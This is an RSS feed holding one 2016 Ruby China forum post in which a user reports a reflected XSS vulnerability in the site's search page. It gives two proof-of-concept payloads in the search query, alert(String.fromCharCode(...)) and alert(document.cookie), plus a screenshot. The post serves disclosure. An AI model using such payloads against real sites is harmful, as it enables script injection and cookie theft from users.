<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>kevins1022 (ning1022)</title>
    <link>https://ruby-china.org/kevins1022</link>
    <description></description>
    <language>en-us</language>
    <item>
      <title>发现了个网站的反射 xss 漏洞，反馈下。</title>
      <description>&lt;p&gt;&lt;a href="https://ruby-china.org/search?q=" rel="nofollow" target="_blank"&gt;https://ruby-china.org/search?q=&lt;/a&gt;alert(String.fromCharCode(88, 83, 83))&lt;/p&gt;

&lt;p&gt;&lt;a href="https://ruby-china.org/search?q=" rel="nofollow" target="_blank"&gt;https://ruby-china.org/search?q=&lt;/a&gt;alert(document.cookie)&lt;/p&gt;

&lt;p&gt;&lt;img src="https://l.ruby-china.com/photo/2016/45328bf5b379f0d07442393ce07a11b3.png" title="" alt=""&gt;&lt;/p&gt;</description>
      <author>kevins1022</author>
      <pubDate>Sun, 03 Jul 2016 18:47:52 +0800</pubDate>
      <link>https://ruby-china.org/topics/30435</link>
      <guid>https://ruby-china.org/topics/30435</guid>
    </item>
  </channel>
</rss>
